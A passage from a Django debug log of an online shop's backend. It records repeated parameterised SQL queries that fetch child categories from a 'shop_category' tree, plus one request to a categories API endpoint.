"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:10:45,250 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:10:45,252 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:10:45,256 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:10:45,259 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:10:45,263 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:10:45,265 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:10:45,267 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:10:45,270 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:10:45,272 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:10:45,276 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:10:45,278 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:10:45,281 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:10:45,283 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:10:45,286 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:10:45,288 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:10:45,292 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:10:45,294 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:10:45,296 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:10:45,300 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:10:45,302 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:10:45,306 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:10:45,308 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:10:45,311 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:10:45,313 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:10:45,316 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:10:45,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:10:45,322 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:10:45,324 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:10:45,327 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:10:45,330 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:10:45,334 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:10:45,339 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:10:45,343 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:10:45,346 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:10:45,350 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:10:45,352 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:10:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:12:51,557 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:12:51,567 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:12:51,573 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:12:51,577 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:12:51,583 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:12:51,587 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:12:51,591 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:12:51,594 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:12:51,598 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:12:51,604 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:12:51,606 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:12:51,609 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:12:51,611 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:12:51,613 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:12:51,616 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:12:51,618 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:12:51,621 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:12:51,623 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:12:51,625 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:12:51,628 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:12:51,631 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:12:51,633 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:12:51,635 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:12:51,637 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:12:51,639 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:12:51,642 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:12:51,644 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:12:51,647 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:12:51,649 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:12:51,651 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:12:51,655 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY 